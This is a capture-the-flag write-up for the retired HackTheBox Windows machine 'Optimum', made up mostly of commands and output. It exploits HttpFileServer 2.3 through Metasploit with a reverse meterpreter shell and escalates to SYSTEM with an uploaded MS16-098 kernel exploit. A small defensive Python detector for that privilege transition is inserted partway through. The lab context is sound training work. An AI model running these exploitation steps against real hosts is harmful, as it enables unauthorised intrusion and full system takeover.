HackTheBox: Optimum
This is a retired beginner-level machine from HackTheBox. It is a Windows machine, which I really need more practice at…
Scanning:
Find running services:
crazyeights@es-base:~$ nmap -PS 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-15 10:42 EST
Nmap scan report for 10.10.10.8
Host is up (0.034s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
80/tcp open http
Port 80:
In the page source we find the server publisher name:
HttpFileServer 2.3
There are exploits for this version.
Trying the Metasploit version:
msf5> search rejetto
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
msf5 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/rejetto_hfs_exec) > options
msf5 exploit(windows/http/rejetto_hfs_exec) > set LHOST 10.10.14.25
LHOST => 10.10.14.25
msf5 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS 10.10.10.8
RHOSTS => 10.10.10.8
msf5 exploit(windows/http/rejetto_hfs_exec) > exploit
User
After running the exploit we now have user:
meterpreter > getuid
Server username: OPTIMUM\kostas
meterpreter >
We can now get the user flag:
meterpreter > pwd
C:\Users\kostas\Desktop
meterpreter > dir
100444/r--r--r-- 32 fil 2017-03-18 08:13:18 -0400 user.txt.txt
meterpreter > cat user.txt.txt
d0c39_i_dont_want_to_get_in_trouble
Listing system info:
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
This version of the OS has a vulnerability that will allow us to elevate our privileges.
I found the link to the repo with the exploit exe at the first link, and the exe itself at the second:
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-098
Root
Upload and run the exploit to get system:
meterpreter > upload Downloads/bfill.exe
[*] uploading : Downloads/bfill.exe -> bfill.exe
[*] Uploaded 547.00 KiB of 547.00 KiB (100.0%): Downloads/bfill.exe -> bfill.exe
[*] uploaded : Downloads/bfill.exe -> bfill.exe
meterpreter > shell
Process 1828 created.
Channel 12 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas>bfill.exe
bfill.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas>whoami
whoami
nt authority\system
C:\Users\kostas>
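From the defender's side, the session above leaves one clear artifact: a process running as nt authority\system whose parent was started by OPTIMUM\kostas. The following is an added example, not part of the original write-up, that flags that transition in process-creation events; the event record format, the allowlist parameter, the bfill.exe path and every PID other than 1828 are constructed for illustration.

```python
from dataclasses import dataclass

SYSTEM = "nt authority\\system"


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    user: str
    image: str


# Constructed sample events modelled on the session above. Only PID 1828 and
# the account names come from the write-up; everything else is made up.
SAMPLE_EVENTS = [
    ProcEvent(4, 0, "NT AUTHORITY\\SYSTEM", "System"),
    ProcEvent(500, 4, "NT AUTHORITY\\SYSTEM", "C:\\Windows\\System32\\services.exe"),
    ProcEvent(1828, 1500, "OPTIMUM\\kostas", "C:\\Windows\\System32\\cmd.exe"),
    ProcEvent(2040, 1828, "OPTIMUM\\kostas", "C:\\Users\\kostas\\bfill.exe"),
    ProcEvent(2112, 2040, "NT AUTHORITY\\SYSTEM", "C:\\Windows\\System32\\cmd.exe"),
    ProcEvent(2200, 2112, "NT AUTHORITY\\SYSTEM", "C:\\Windows\\System32\\whoami.exe"),
]


def find_unexpected_system_children(events, allowed_parents=frozenset()):
    """Return (child, parent) pairs where the child runs as SYSTEM but the
    parent was created under another account. Events must be in creation order.
    allowed_parents: lower-case image paths of known elevation brokers (assumption)."""
    seen = {}
    hits = []
    for ev in events:
        parent = seen.get(ev.ppid)  # None when the parent was never logged
        if (
            ev.user.lower() == SYSTEM
            and parent is not None
            and parent.user.lower() != SYSTEM
            and parent.image.lower() not in allowed_parents
        ):
            hits.append((ev, parent))
        seen[ev.pid] = ev  # a reused PID is replaced by the newer process
    return hits


if __name__ == "__main__":
    for child, parent in find_unexpected_system_children(SAMPLE_EVENTS):
        print(f"ALERT pid={child.pid} {child.image} as {child.user}; "
              f"parent pid={parent.pid} {parent.image} as {parent.user}")
```

Only the boundary process is reported: the whoami child of the SYSTEM shell inherits its parent's account, so it does not raise a second alert.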
The root flag can be found on the Administrator’s desktop.
C:\Users\Administrator\Desktop>type root.txt
type root.txt
51ed_i_dont_want_to_get_in_trouble
FIN. 🥳